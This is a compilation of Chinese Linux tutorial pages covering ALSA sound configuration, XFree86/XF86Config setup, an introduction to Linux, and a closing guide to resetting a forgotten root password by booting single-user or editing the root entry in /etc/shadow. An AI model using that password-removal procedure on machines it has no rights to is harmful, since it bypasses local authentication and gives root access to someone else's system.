对于声卡驱动程序，除了内核自带的驱动程序之外，您还可以使用Advanced Linux Sound Architecture（ALSA，http://www.alsa-project.org/）提供的驱动程序。它支持一系列主流声卡，同时它和内核的声音结构互相兼容，在某种程度上，可以说是内核的声卡驱动模块的补充。

ALSA的声卡驱动程序的一般命名规则是snd-card- 。soundcard代表不同类型的声卡。例如，对于所有的16位Soundblaster声卡，它们对应的驱动程序模块为snd-card-sb16。

若与需要linux内核声音驱动的向后兼容性，您还需要两个模块snd-pcm-oss和snd-mixer-oss。对于amixer设置的多个混音器，它们都是针对不同的设备的。比如CD通道的设置是针对CD播放器的。而很多应用程序，如象mpg123，xmms，realplayer，都要依赖PCM通道的设置。MIC代表麦克风。不同的Gain部分对于不同的使用能提供特别的增益。

缺省情况下ALSA静音所有的输出。为了获得声音，必须解除主音量和PCM音量的静音。
amixer -c 0 sset Master,0 100%,100% unmute
amixer -c 0 sset PCM ,0 100% unmute

选项包括mute，unmute，capture，nocapture，rec，norec，数字或left:right。amixer不带参数运行时，返回声卡上所有通道的设置情况。

为了在每次插入声卡驱动模块时，都打开静音，您可以在/etc/modules.conf加入下列语句：
post-install snd-card-sb16 amixer -c 0 sset Master,0 100%,100% unmute && amixer -c 0 sset PCM ,0 100% unmute
在成功插入了alsa声卡模块之后，系统会出现/proc/asound目录，这个目录描述了声卡的工作情况，以及创建的设备文件。

在您加载snd-pcm-oss设备模块之后，你也能使用与oss兼容的方式存取声卡，这时如下的映射会被完成： ALSA设备 OSS设备 次设备号
/dev/snd/pcmC0D0 /dev/audio0（/dev/audio） 4
/dev/snd/pcmC0D0 /dev/dsp0（/dev/dsp） 3
/dev/snd/pcmC0D1 /dev/adsp（/dev/adsp） 12
/dev/snd/pcmC1D0 /dev/audio1 20
/dev/snd/pcmC1D0 /dev/dsp1 19
/dev/snd/pcmC1D1 /dev/adsp1 28
/dev/snd/pcmC2D0 /dev/audio2 36
/dev/snd/pcmC2D0 /dev/dsp2 35
/dev/snd/pcmC2D1 /dev/adsp2 44
表 5-3

对于/dev/mixer设备，要加载snd-mixer-oss，可以保证和老的oss混音器的兼容性。如果您插入了上述设备之后，声音系统仍无法正常工作，您可以运行snddevices命令，建立正确的设备文件。

由于为使ALSA正常工作，需要设置大量的设备别名，下面就给出一个/etc/modules.conf的例子，它能够完成ESS Solo1声卡的自动配置工作。其他的ALSA设备的设置也基本与此声卡相同。

# 设置ALSA设备的主设备号，它固定为116
alias char-major-116 snd

# 设置OSS设备的主设备号，它固定为14，这使得ALSA复用OSS设备
alias char-major-14 soundcore

# ALSA设备别名
alias sound-card-0 snd-card-es1938

# OSS设备别名
alias sound-slot-0 sound-card-0

# 安装不同的声卡服务
alias sound-service-0-0 snd-mixer-oss
alias sound-service-0-1 snd-seq-oss
alias sound-service-0-3 snd-pcm-oss
alias sound-service-0-8 snd-seq-oss
alias snd-minor-oss-12 snd-pcm-oss

# 运行amixer命令，打开声音输出
post-install snd-card-es1938 amixer -c 0 sset Master,0 100%,100% unmute && amixer -c 0 sset PCM ,0 100% unmute

返回


如何在Linux下实现设备的配置（下）

《一键清理系统垃圾》

如何在Linux下实现设备的配置（下）

    本文是《如何在Linux下实现设备的配置》的第二部分，将接着向您介绍窗口系统（XFree86）的配置过程。
6 窗口系统（XFree86）的配置过程
6.1 显示卡的描述文件介绍（CardDB）
CardDB是X配置程序使用的显示卡数据文件。在对XFree86进行配置时，配置程序一般都需要读取其上的内容完成显示卡的配置。它的内容与使用的XFree86的版本密切相关。一般而言，它保存的位置是在/usr/X11R6/lib/X11/目录下。现在我们就对XFree86 4.1.0的CardDB文件进行简单的介绍：

NAME
显示卡的描述名称

CHIPSET
描述显示卡使用的芯片集

SERVER
为了和3.x版本的XFree86向下兼容，由此字段指定此显示卡在XFree86 3.x下的X服务器，例如VGA16，SVGA等。

DRIVER
描述在4.x版本的XFree86下显示卡的驱动程序模块。

LINE
设置显示卡特定的选项信息，这样的选项信息出现在XF86Config的Device节，对应设备的Option参数。

SEE
是指此显示卡的配置信息与SEE字段所制定的显示卡完全相同，例如

NAME Number Nine GXE64 with S3 Trio64
SEE S3 Trio64 (generic)
表示Number Nine GXE64的显示卡配置与S3 Trio64 (generic)的配置完全相同。
RAMDAC
RAM直接存取控制的控制芯片型号

DACSPEED
直接存取控制的速度

CLOCKCHIP
此显示卡的时钟芯片的

NOCLOCKCHIP
此显示卡无时钟芯片

UNSUPPORTED
此类型的显卡，此版本的XFree86不能提供支持

COMMENT
注释

例如，对于RIVA TNT显卡，XFree86 4.1.0中的信息如下：

NAME RIVA TNT
CHIPSET RIVATNT
SERVER SVGA
DRIVER nv
NOCLOCKPROBE

6.2 显示器信息检测
显示器的信息在XFree86系统中时非常重要的，它对应XFree86配置文件的Monitor节。在这一节中包含监视器的水平扫描频率范围，垂直扫描频率范围，显示器支持的显示模式等信息。同样的，显示器的自动检测也就是通过程序自动读出显示器的上述信息。它的正确设置对于XFree86能否正常显示起到很重要的作用。

对于显示器的信息检测，要求它必须支持vbe（VESA的BIOS级扩展）。在显示器支持此扩展时，通过系统实模式下的BIOS调用INT 10H，可以取得显示器的详细信息。

可能需要的BIOS子功能调用为：

AH = 0x4F00
获得关于监视器的VESA的BIOS级扩展信息

AH = 0x4F01
获得监视器支持的特定显示模式

AH = 0x4F02
设置当前的视频模式

AH = 0x4F03
获得当前的视频模式

AH = 0x4F04
保存/还原svga显示方式

AH = 0x4F15
获得监视器的EDID扩展信息

一般的显示器使用上述中断的方式是：先检查显示器是否支持VESA的BIOS级扩展，如果显示器支持BIOS级扩展，就查看显示器支持的显示模式，然后获得显示器的EDID扩展信息。在读出的EDID扩展信息中，可以查出显示器的垂直回扫频率范围和水平回扫频率范围，也可以计算出显示器的大小，对于一部分显示器还可以从此信息中读出监视器的制造商信息。

由显示器读出的信息可以设置XF86Config的Monitor节，对于设置了正确的垂直回扫频率范围和水平回扫频率范围的显示器，X自动设置为当前显示分辨率下支持的最高扫描频率的显示模式（此显示模式要求有对应的Modeline）。

但是如果您的显示器不支持EDID扩展信息，那么您就只有根据经验来设置显示器的垂直回扫频率范围和水平回扫频率范围。如果设置的范围高于监视器的实际支持范围，那么显示器会出现黑屏的现象。

对于编程实现，如果您要调用上述bios中断，那么必须使用lrmi这个实模式接口，并设置正确的寄存器信息，完成系统调用。具体的检测显示器信息的例子，您可以参考Xconfigurator下ddcprobe的源程序，也可以参考Mandrake系统下的ddcxinfos命令的源程序。

6.3 窗口系统的配置过程
要正确的在Linux下配置窗口系统，实际上就是生成正确的XFree86配置文件，这个文件一般保存在/etc/X11/下，在X版本是3.x时，它的文件名为XF86Config，在X版本是4.x时，它的文件名一般为XF86Config-4。在现在的发行版本中，处于硬件兼容性的考虑，他们一般都让这两个版本的XFree86包共存。因此，您也可以在/etc/X11目录下，发现这两个文件同时存在，这时使用那个文件就要看系统的X服务器的版本了。

无论是那个版本的XF86Config文件都是由许多节（Section）构成的，但是这些节描述的内容主要包括：键盘、鼠标、显示器、显示卡、字体（颜色）等。

在X版本是3.x时，键盘和鼠标的描述分别对应Keyboard和Pointer节。而在X版本是4.x时，键盘和鼠标的描述都对应InputDevice节，只是对应不同的驱动模块，键盘的驱动模块是keyboard，鼠标的驱动模块是mouse。配置这两节所需要的信息可以从/etc/sysconfig/keyboard和/etc/sysconfig/mouse中获得，它们的详细内容，本文的前面章节已作了介绍。

配置显示器实际上是生成XF86Config文件的Monitor节，需要配置的信息一般包括：水平扫描频率范围、垂直扫描频率范围、监视器支持的显示模式、制造商信息。对于支持vbe和edid扩展的显示器，可以根据从显示器上读出的信息设置对应字段的值。但是如果显示器不支持上述扩展，则显示卡的设置必须由用户手动完成。如果您在配置XFree86时不指定这一节，那么XFree86会设置显示模式为640x480，垂直扫描频率为60hz的方式。不同显示模式的扫描频率： 显示分辨率 垂直扫描频率（Hz） 水平扫描频率（kHz）
640x480 60 31.50
640x480 72 36.50
640x480 75 37.50
640x480 85 43.27
800x600 60 37.80
800x600 72 48.00
800x600 85 55.84
800x600 100 64.02
1024x768 60 48.40
1024x768 70 56.50
1024x768 76 62.50
1024x768 85 70.24
1024x768 100 80.21
1280x1024 61 64.20
1280x1024 70 74.59
1280x1024 74 78.85
1280x1024 76 81.13
1280x1024 85 91.15
1280x1024 100 107.16
1600x1200 60 75.00
1600x1200 70 87.50
1600x1200 75 93.75
1600x1200 85 105.77
表 6-1

从上表可以看出，您要设置显示器达到某一分辨率，那么与此相对应，它的扫描频率范围也要包含上表中此分辨率的最低扫描频率。如果您的显示器达不到这个范围，那么XWindow将无法正常工作。如果您设置的扫描频率高于显示器实际的扫描频率范围，由于XFree86会寻找对应分辨率下最高扫描频率进行显示，所以此时XWindow将极有可能黑屏。

在生成配置脚本时，扫描频率的范围也不是越低越好。设置较低的扫描频率范围对于部分LCD显示器就不合适。比如，一部分LCD显示器在800x600分辨率时，最低支持的垂直扫描频率为70Hz，那么您这时指定的水平回扫范围一定要包含48kHz。

在配置完显示器之后，您就需要生成与显示卡对应的描述了。这样的描述信息对应XF86Config文件的Device节。这一节主要描述的显示卡信息包括：显示卡对应的X服务器（X版本在3.x），对应的X设备模块（X版本为4.x），显示卡的设备信息（供应商、型号、支持显存存取方式和显存大小等），以及此显示卡支持的设备选项，比如显示卡是否支持硬件加速、是否支持软光标等。生成窗口系统的配置过程一般是先由pci的设备标识（检测过程见）获得显示卡的类型，由此在XFree86的配置文件CardDB（这个文件可在/usr/X11R6/lib/X11/目录下找到）中查得它对应的显示卡描述，由此信息可以设置此节的描述。

字体和调色板信息描述的是字体和调色板所存放的路径，您如果新加入字体时，需要在此加入正确的字体路径。设置字体路径时，如果指定它为unix:-1，那么就是说您在启动X服务器之前，必须首先启动字体服务器xfs，然后由字体服务器完成字体的访问请求。

在您正确的设置了上述信息之后，您必须将这些信息存放在Screen节中。这一节描述的是完成显示对应的显示卡，显示器，分辨率和缺省深度等信息。

最后，您还必须生成ServerLayout节，由它描述整个系统所使用的显示卡配置节、监视器配置节、鼠标配置节、键盘配置节等信息。

在生成了/etc/X11/XF86Config（XF86Config-4）文件后，您就可以测试一下此配置文件是否正确了。例如，对于XFree86 4.x，生成的配置文件为/etc/X11/XF86Config.test，测试使用如下命令：

XFree86 -xf86config /etc/X11/XF86Config.test :9
-xf86config /etc/X11/XF86Config.test表示使用指定的配置文件启动X服务器
:9 表示在终端9上运行X服务器

一般而言，如果是编程实现X的配置过程的话，则要以子进程的方式（系统调用fork）运行上述命令，在成功启动X服务器之后，运行一个小的图形化程序，让用户选择配置是否成功。

当然，如果您不能得到显卡的详细的设备参数的话，您也可以使用probeonly选项获得显示卡的详细信息。例如，对于XFree86 4.x测试使用如下命令：
XFree86 -probeonly :9

对于正常的启动XFree86之后，系统输出的信息，您可以通过读取/var/log/XFree86.x.log获得。x是指XFree86启动的终端，一般设置此x为0。

在XF86Config文件配置之后，您可以使用startx启动XFree86。这个文件会运行您的登录目录下的.xinitrc文件来修改X Window系统的初始显示状态。这个文件是一个脚本文件。如果这个文件不存在，系统就会默认使用/usr/X11R6/lib/X11/xinit/xinitrc。同时，startx还要查找/etc/X11/X，这个文件是一个链接文件，它指向真正的X服务程序，现在这个程序一般都指向Xwrappers，它是对X服务程序的封装。当然，这个文件也可以直接指向X服务程序XFree86。

6.4 支持FrameBuffer方式的显卡的配置过程
帧缓冲(FrameBuffer)设备是指一种不带视频加速的X11支持设备。启动此方式的优点主要有三点：其一是在控制台方式工作时，您能设置更大的控制台显示区，比如设置1024x768分辨率大小的控制台；其二是可以在其上启动XF86_FBDev（对于XFree86 4.x下，使用启动模块fbdev）；其三是可以在启动时显示启动徽标（一只胖胖的企鹅）。

在有时显示卡对应的XFree86驱动程序不能正常工作时，而您又需要比较丰富的色彩时，启动FrameBuffer往往是必须的选择。启动FrameBuffer时，XFree86启动的分辨率由FrameBuffer的启动模式决定。

能够启动FrameBuffer的设备是intel结构下与vesa 2.0标准兼容显卡的帧缓冲设备，但是现在不能在支持vesa 1.2的显卡上支持FrameBuffer。这是因为vesa 1.2不支持线性帧缓冲（线性帧缓冲意味着CPU能访问显卡的每一位）。您可以下载补丁，以使vesafb支持vesa 1.2的显卡，比如一些较老的s3系列显卡。

现在支持vesa 2.0的显卡主要有：
ATI PCI VideoExpression 2MB (max. 1280x1024 @ 8bit)
ATI PCI All-in-Wonder
Matrox Millennium PCI - BIOS v3.0
Matrox Millennium II PCI - BIOS v1.5
Matrox Millennium II AGP - BIOS v1.4
Matrox Millennium G200 AGP - BIOS v1.3
Matrox Mystique & Mystique 220 PCI - BIOS v1.8
Matrox Mystique G200 AGP - BIOS v1.3
Matrox Productiva G100 AGP - BIOS v1.4
All Riva 128 based cards
Diamond Viper V330 PCI 4MB
Genoa Phantom 3D/S3 ViRGE/DX
Hercules Stingray 128/3D with TV output
Hercules Stingray 128/3D without TV output - needs BIOS upgrade (free from
support@hercules.com)
SiS 6326 PCI/AGP 4MB
STB Lightspeed 128 (Nvida Riva 128 based) PCI
STB Velocity 128 (Nvida Riva 128 based) PCI
Jaton Video-58P ET6000 PCI 2MB-4MB (max. 1600x1200 @ 8bit)
Voodoo2 2000

主板集成显示卡：
Trident Cyber9397
SiS 5598

启动FrameBuffer必须设置内核的启动显示模式，设置这个参数是通过内核参数vga=实现的。比如，设置启动之后的分辨率为640x480下的16位色时，传递的参数为vga=785（十进制数）。您也可以在/etc/lilo.conf文件中设置此参数，由lilo传递内核参数。

内核支持的FrameBuffer显示模式如下表： 显示深度 640x400 640x480 800x600 1024x768 1152x864 1280x1024 1600x1200
4 bits 0x302
8 bits 0x300 0x301 0x303 0x305 0x161 0x307 0x31C
15 bits 0x310 0x313 0x316 0x162 0x319 0x31D
16 bits 0x311 0x314 0x317 0x163 0x31A 0x31E
24 bits 0x312 0x315 0x318 0x31B 0x31F
32 bits 0x164
表 6-2

向内核传递vesa选项还包括：
video=vesa:option，多个选项之间可用逗号隔开；

可接受的选项：
ypan
使用vesa保护模式接口显示，可视屏幕是视频内存的一个窗口。

pro
快速的整屏卷滚，允许回滚。

kontra
部分卷滚，可产生一些闪动效果。

ywrap
比ypan速度快，但是兼容性差。

redraw
缺省使用，通过重绘受影响的屏幕区进行重画。

vgapal
缺省使用，标准的vga调色版寄存器。

pmipal
使用保护模式的调色版接口。

例如，下面的操作设置FrameBuffer设备的显示：
export FRAMEBUFFER=/dev/fb1
fbset -fb /dev/fb1 -vyres 600
fbset -fb $FRAMEBUFFER 1024x768@60
startx -- :0 -bpp 16 vt06
在虚拟控制终端6以16为颜色深度启动X服务器。

如果您要对帧缓冲设备编程，则可以象使用/dev/mem一样，读、写、定位以及mmap（）此设备。不同的是，您此时操作的设备内存位于视频设备内存中。/dev/fb*设备也支持几种ioctl操作，由此可以获得或设置设备信息。颜色表的处理使用ioctl（）。

6.5 XF86Config文件格式(版本为4.x系列)
6.5.1 文件的基本组成

文件的每节都是由下述的部分组成：

Section "SectionName"
SectionEntry
…
EndSection
SectionName包括：

Files 文件路径名
ServerFlags 服务器标志
Module 动态模块加载
InputDevice 输入设备描述
Device 图形设备描述
VideoAdaptor Xv视频卡描述
Monitor 监视器描述
Modes 视频模式描述
Screen 屏幕配置
ServerLayout 全面的层叠
DRI DRI特定的配置
Vendor 供应商特定的配置

出于向下兼容的目的，下列项虽已废除但是配置文件仍能识别。在新的配置文件中，应使用新的InputDevice项。
Keyboard 键盘配置
Pointer 指针/鼠标配置
老的XInput节已经被废除。

ServerLayout在最高层。它们绑定的输入输出设备会在这一节里使用。输入设备由InputDevice描述，输出设备通常有多个独立的组件组成。多个组件组成Screen节。每个Screen节将图形板和监视器绑定在一起。显示卡由Device节描述，监视器由Monitor节描述。

6.5.2 Files节
Files节指定X服务器的字体路径、调色板路径和模块路径。

FontPath "path"
设置字体的查询路径。对于字体服务器的表示采用下述的形式：
/ :
指定与字体服务器连接的传输类型（unix，tcp）。
若此节不指定，则缺省的字体路径是：
/usr/X11R6/lib/X11/fonts/misc/
/usr/X11R6/lib/X11/fonts/Speedo/
/usr/X11R6/lib/X11/fonts/Type1/
/usr/X11R6/lib/X11/fonts/CID/
/usr/X11R6/lib/X11/fonts/75dpi/
/usr/X11R6/lib/X11/fonts/100dpi/
一般而言，推荐的字体路径是：
/usr/X11R6/lib/X11/fonts/local/
/usr/X11R6/lib/X11/fonts/misc/
/usr/X11R6/lib/X11/fonts/75dpi/:unscaled
/usr/X11R6/lib/X11/fonts/100dpi/:unscaled
/usr/X11R6/lib/X11/fonts/Type1/
/usr/X11R6/lib/X11/fonts/CID/
/usr/X11R6/lib/X11/fonts/Speedo/
/usr/X11R6/lib/X11/fonts/75dpi/
/usr/X11R6/lib/X11/fonts/100dpi/
RGBPath "path"
rgb颜色数据库的路径，缺省值为：/usr/X11R6/lib/X11/rgb。
ModulePath "path"
设置可加载的X服务器模块的查找路径。
6.5.3 ServerFlags节
ServerFlags节用于指定全局的X服务器选项，在一般情况下这个部分是空的。

Option "NoTrapSignals" "boolean"
此选项可以阻止X服务器捕获未期待的致命信号并干净的退出。X服务器退出并擦除core文件。
Option "DontZap" "boolean"
打开此选项之后，可以禁止Ctrl+Alt+Backspace的使用。
Option "DontZoom" "boolean"
打开此选项，可以禁止键Ctrl+Alt+Keypad-Plus and Ctrl+Alt+Keypad-Minus来切换视频模式。
Option "DisableVidModeExtension" "boolean"
可以用来禁止VidMode扩展。
Option "AllowNonLocalXvidtune" "boolean"
打开允许xvidtune客户从其他的主机连接。
Option "DisableModInDev" "boolean"
关闭可以禁止XFree86-Misc扩展（可用于动态修改输入设备的设置）。
Option "AllowNonLocalModInDev" "boolean"
允许客户连接另一台主机并且在运行的服务器上改变键盘和鼠标的设置。
Option "AllowMouseOpenFail" "boolean"
即使鼠标设备不能被打开/初始化也允许X服务器启动。
Option "VTInit" "command"
在服务器所用的VT被打开之后运行命令。此命令被传到"/bin/sh -c"，以与此VT设置的stdin和stdout相同的真正用户id运行。
Option "VTSysReq" "boolean"
使非SYSV系统的VT能支持SYSV风格的切换序列。这意味着在Alt-SysRq之后紧接着功能键（Fn）。这阻止X服务器捕获用于缺省VT的切换序列键（已使客户能够存取它们）。
Option "BlankTime" "time"
设置黑屏屏保的超时时间。time以分钟为单位，缺省10分钟。（xset进行动态设置）
Option "StandbyTime" "time"
Option "SuspendTime" "time"
Option "OffTime" "time"
设置进入DPMS的等待状态的时间，这仅适于支持VESA DPMS兼容方式的监视器。缺省时间是20分钟。（屏幕设置有DPMS选项设置）
Option "Pixmap" "bpp"
设置象素格式使用深度为24的格式。
Option "NoPM" "boolean"
禁止电源管理
Option "Xinerama" "boolean"
使能或禁止XINERAMA扩展
6.5.4 Module节
此节用于指定加载的X服务器模块。此节在X服务器以静态方式建立时是被忽略的。在此节中加载的模块一般为X服务器扩展模块和光栅字体模块。大多数其他模块在需要时自动加载。

Load "modulename"
例如：Type 1光栅字体模块由下列入口加载：

Load "type1"

SubSection "modulename"
Option "moduleoption"
EndSubSection

6.5.5 Inputdevice节
这一节写入的信息是从/etc/sysconfig/mouse和/etc/sysconfig/keyboard中读出的，并且要求两者的设置基本保持一致。一般而言，都存在两种输入设备：其一是核心键盘，另一是核心指针，指针设备主要是指鼠标，但也可以是触摸屏等其他设备。

Section "InputDevice"
Identifier "name"
Driver "InputDriver"
options
...
EndSection
最常见的InputDriver是"keyboard"和"mouse"。
Option "CorePointer"
设备被作为核心指针安装。系统必须要有一个核心指针。
Option "CoreKeyboard"
在这一选项被设置时，设备被作为核心键盘安装。系统中有且只有一个核心键盘。
Option "AlwaysCore" "boolean"
Option "SendCoreEvents" "boolean"
上面的两个选项是等价的，它引起输入设备总是报告核心事件。它可以用于附加的指针设备生成核心事件。
Option "HistorySize" "number"
设置移动历史的大小，缺省是0。
6.5.6 Device节
这一节描述显示卡对应的信息，它的内容一般从CardDB文件中显示卡对应的描述中获得。若此设备节被Screen节引用，则认为此节是可用的。

Section "Device"
Identifier "name"
Driver "driver"
entries
… …
EndSection
BusID "bus-id"
指定图形卡的总线位置。对于PCI/AGP卡，bus-id串具有PCI:bus:device:function的格式。XFree86支持多个显示卡的同时显示
Screen number
VideoRam mem
此选项指定图形卡的RAM数量，以KB为单位。X服务程序会自动探测显示卡，所以此字段一般并不需要指定。
Chipset "chipset"
图形卡上的芯片组类型。
Ramdac "ramdac-type"
DacSpeed speed
DacSpeed speed-8 speed-16 speed-24 speed-32
ClockChip "clockchip-type"
BiosBase baseaddress
MemBase baseaddress
IOBase baseaddress
ChipID id
ChipRev rev
TextClockFreq freq
以上10个字段，它们表示一些具体的X配置参数。一般在配置X服务器时无需指定，而由自动检测决定它们的值。

6.5.7 Monitor节
Monitor节描述显示器的信息，至少有一个显示器节。在显示器支持vbe和edid扩展时，它的所有信息都可以从显示器上读出。

Section "Monitor"
Identifier "name"
entries
…
EndSection
VendorName "vendor"
显示器的制造商

ModelName "model"
监视器的型号

HorizSync horizsync-range
监视器支持的水平刷新频率范围。单位是kHz，缺省范围是28-33kHz。

VertRefresh vertrefresh-range
监视器支持的垂直刷新频率范围。单位是Hz，缺省范围是43-72Hz。

Gamma gamma-value
Gamma red-gamma green-gamma blue-gamma
用于gamma校正，范围从0.1到10.0，缺省值是1.0。并非所有的驱动程序具有使用此信息的能力。

UseModes "modesection-id"
包括Modes节称为modesection-id列出的模式集合。这使得这些模式可用于此显示器。

Mode "name"
设置视频模式的详细定义。以EndMode关键字结束。

DotClock clock
此模式下的点时钟速率。

HTimings hdisp hsyncstart hsyncend htotal
指定模式的水平定时。

VTimings vdisp vsyncstart vsyncend vtotal
指定模式的垂直定时。

Flags "flag" ...
flag指定模式的选项设置。"Interlace"设置模式是交错的。"DoubleScan"指定每个扫描行是双次的。"+HSync"和"-HSync"指定HSync信号的极性。"+VSync"和"-VSync"指定VSync信号的极性。"Composite"指定复合同步信号。"+CSync"和"-CSync"指定复合同步信号的极性。

HSkew hskew
指定像素数

VScan vscan
每根扫描线绘制的次数。"DoubleScan"加倍这个值。

ModeLine "name" mode-description
Mode项的紧凑版本。大多数情况下，X服务程序内含的VESA显示模式已经足够，您无需另外指定。

6.5.8 Screen节
一个配置文件中可以有多个Screen节，但至少要有一个。这一节表示了显示卡和监视器联结在一起的信息。当它出现在ServerLayout中时，这一节所表示的信息就是激活的，否则系统选择第一个出现的Screen节作为活动的。这一节描述了显示分辨率，缺省深度等信息。它必须包含至少一个Display子节，这些子节提供了与显示深度相关的信息。

Section "Screen"
Identifier "name"
Device "devid"
Monitor "monid"
entries
…
SubSection "Display"
entries
…
EndSubSection
…
EndSection
Device "device-id"
指定这一节所使用的Device节，device-id和Device节的Identifier相同。

Monitor "monitor-id"
指定这一节所使用的Monitor描述

VideoAdaptor "xv-id"
指定可选的Xv适配器描述

DefaultDepth depth
指定缺省显示深度。

DefaultFbBpp bpp
指定缺省时使用的帧缓冲深度。

Display子节：

SubSection "Display"
Depth depth
entries
…
EndSubSection
Depth depth
指定此节表示的深度。

FbBpp bpp
指定此节表示的帧缓冲格式。

Weight red-weight green-weight blue-weight
指定16位显示时，RGB三种颜色所占的权重

Virtual xdim ydim
设置逻辑虚屏的大小，xdim一般要求为8或16的整数倍。注意：有的驱动程序不允许设置虚屏。

ViewPort x0 y0
设置初始显示的左上角。

Modes "mode-name" ...
设置此深度下的视频模式列表。所指定没个模式必须被双引号括起来。这必须和Monitor节指定的信息相对应，也就是说，Monitor节指定的扫描频率范围一定要包含对应的模式。

Visual "visual-name"
visual-name可用的类型是StaticGray GrayScale StaticColor PseudoColor TrueColor DirectColor

Black red green blue

White red green blue
分别可以指定黑色和白色的颜色

6.5.9 ServerLayout节
每个配置文件可以有多个ServerLayout节，一个ServerLayout表示多个Screen和一个或多个输入设备（InputDevice节）的组合。

Section "ServerLayout"
Identifier "name"
Screen "screen-id"
…
InputDevice "idev-id"
…
options
…
EndSection
Screen screen-num "screen-id" position-information

screen-id是强制的，指定引用的Screen节
InputDevice "idev-id" "option" ...
idev-id也是强制的，指定被引用的InputDevice节，可以指定多个选项，它们之间由引号隔开，这些选项也是InputDevice节支持的，包括："CorePointer"，"CoreKeyboard"，"SendCoreEvents"。

例如，指定两个鼠标：

Section "ServerLayout"
Identifier "Layout 1"
Screen "MGA 1"
Screen "MGA 2" RightOf "MGA 1"
InputDevice "Keyboard 1" "CoreKeyboard"
InputDevice "Mouse 1" "CorePointer"
InputDevice "Mouse 2" "SendCoreEvents"
Option "BlankTime" "5"
EndSection

返回


什么是Linux

《一键清理系统垃圾》

什么是Linux

    简单地说，Linux是一套免费使用和自由传播的类Unix操作系统，它主要用于基于Intel x86系列CPU的计算机上。这个系统是由全世界各地的成千上万的程序员设计和实现的。其目的是建立不受任何商品化软件的版权制约的、全世界都能自由使用的Unix兼容产品。

    Linux的出现，最早开始于一位名叫Linus Torvalds的计算机业余爱好者，当时他是芬兰赫尔辛基大学的学生。他的目的是想设计一个代替Minix（是由一位名叫Andrew Tannebaum的计算机教授编写的一个操作系统示教程序）的操作系统，这个操作系统可用于386、486或奔腾处理器的个人计算机上，并且具有Unix操作系统的全部功能，因而开始了Linux雏形的设计。

    Linux以它的高效性和灵活性著称。它能够在PC计算机上实现全部的Unix特性，具有多任务、多用户的能力。Linux是在GNU公共许可权限下免费获得的，是一个符合POSIX标准的操作系统。Linux操作系统软件包不仅包括完整的Linux操作系统，而且还包括了文本编辑器、高级语言编译器等应用软件。它还包括带有多个窗口管理器的X-Windows图形用户界面，如同我们使用Windows NT一样，允许我们使用窗口、图标和菜单对系统进行操作。

    Linux之所以受到广大计算机爱好者的喜爱，主要原因有两个，一是它属于自由软件，用户不用支付任何费用就可以获得它和它的源代码，并且可以根据自己的需要对它进行必要的修改，无偿对它使用，无约束地继续传播。另一个原因是，它具有Unix的全部功能，任何使用Unix操作系统或想要学习Unix操作系统的人都可以从Linux中获益。

    由于Linux是一套具有Unix全部功能的免费操作系统，它在众多的软件中占有很大的优势，为广大的计算机爱好者提供了学习、探索以及修改计算机操作系统内核的机会。

    操作系统是一台计算机必不可少的系统软件，是整个计算机系统的灵魂。一个操作系统是一个复杂的计算机程序集，它提供操作过程的协议或行为准则。没有操作系统，计算机就无法工作，就不能解释和执行用户输入的命令或运行简单的程序。大多数操作系统都是由一些主要的软件公司支持的商品化程序，用户只能有偿使用。如果用户购买了一个操作系统，他就必须满足供应商所要求的一切条件。因为操作系统是系统程序，用户不能擅自修改或试验操作系统的内核。这对于广大计算机爱好者来说无疑是一种束缚。

    要想发挥计算机的作用，仅有操作系统还不够，用户还必须要有各种应用程序的支持。应用程序是用于处理某些工作（如字处理）的软件包，通常它也只能有偿使用。每个应用程序的软件包都为特定的操作系统和机器编写。使用者无权修改这些应用程序。使用Linux，可以将操作系统变成一种操作环境。

    由于Linux是一套自由软件，用户可以无偿地得到它及其源代码，可以无偿地获得大量的应用程序，而且可以任意地修改和补充它们。这对用户学习、了解Unix操作系统的内核非常有益。 学习和使用Linux，能为用户节省一笔可观的资金。Linux是目前唯一可免费获得的、为PC机平台上的多个用户提供多任务、多进程功能的操作系统，这是人们要使用它的主要原因。就PC机平台而言，Linux提供了比其他任何操作系统都要强大的功能，Linux还可以使用户远离各种商品化软件提供者促销广告的诱惑，再也不用承受每过一段时间就升级之苦，因此，可以节省大量用于购买或升级应用程序的资金。

    Linux不仅为用户提供了强大的操作系统功能，而且还提供了丰富的应用软件。用户不但可以从Internet上下载Linux及其源代码，而且还可以从Internet上下载许多Linux的应用程序。可以说，Linux本身包含的应用程序以及移植到Linux上的应用程序包罗万象，任何一位用户都能从有关Linux的网站上找到适合自己特殊需要的应用程序及其源代码，这样，用户就可以根据自己的需要下载源代码，以便修改和扩充操作系统或应用程序的功能。这对Windows NT、Windows98、MS-DOS或OS／2等商品化操作系统来说是无法做到的。

    Linux为广大用户提供了一个在家里学习和使用Unix操作系统的机会。尽管Linux是由计算机爱好者们开发的，但是它在很多方面上是相当稳定的，从而为用户学习和使用目前世界上最流行的Unix操作系统提供了廉价的机会。现在有许多CD-ROM供应商和软件公司（如RedHat和TurboLinux）支持Linux操作系统。Linux成为Unix系统在个人计算机上的一个代用品，并能用于替代那些较为昂贵的系统。因此，如果一个用户在公司上班的时候在Unix系统上编程，或者在工作中是一位Unix的系统管理员，他就可以在家里安装一套Unix的兼容系统，即Linux系统，在家中使用Linux就能够完成一些工作任务。

返回


忘记Linux密码的解决办法

《一键清理系统垃圾》

忘记Linux密码的解决办法

    如果忘记了Linux密码，这时有两种情况，一种是用LILO管理器来启动的，另一种是不通过LILO启动的。
    如果你的系统是通过LILO管理器来启动的，可在LILO启动提示符LILO boot：后输入Linux single，回车后启动Linux系统进入单用户模式，这时，就可以用passwd命令来修改你的密码了，修改完后重新启动系统，就可以使用新的密码了。
    以上方法在一些系统下可行，但在另一些系统下则不行。如果是第二种情况，修改密码就麻烦一些，但经过一些爱好者的反复摸索，发现用以下方法可以清除Linux的密码：用Linux boot软盘启动，当出现LILO boot：提示符时，输入linux mount=/dev/xxxx，其中xxxx为Linux所在的分区，IDE硬盘的设备名为hda，第一分区为hda1，如果你的系统有两个IDE硬盘，第二个为hdb；如果你使用的是SCSI硬盘，则硬盘的设备名为sda。正确输入硬盘的设备及分区号后启动Linux，系统自动将Linux的分区mount到/mnt下，这时，只要进入到/mnt/etc下，用vi命令将passwd文件中root行中的密码去掉，重新引导系统后，在超级用户下执行passwd命令，重新生成一个密码即可。如果你的系统拥有passwd和shadow两个文件，需要修改的密码文件则是/etc下的shadow，它是passwd的一个映象，是真正存放密码的文件。
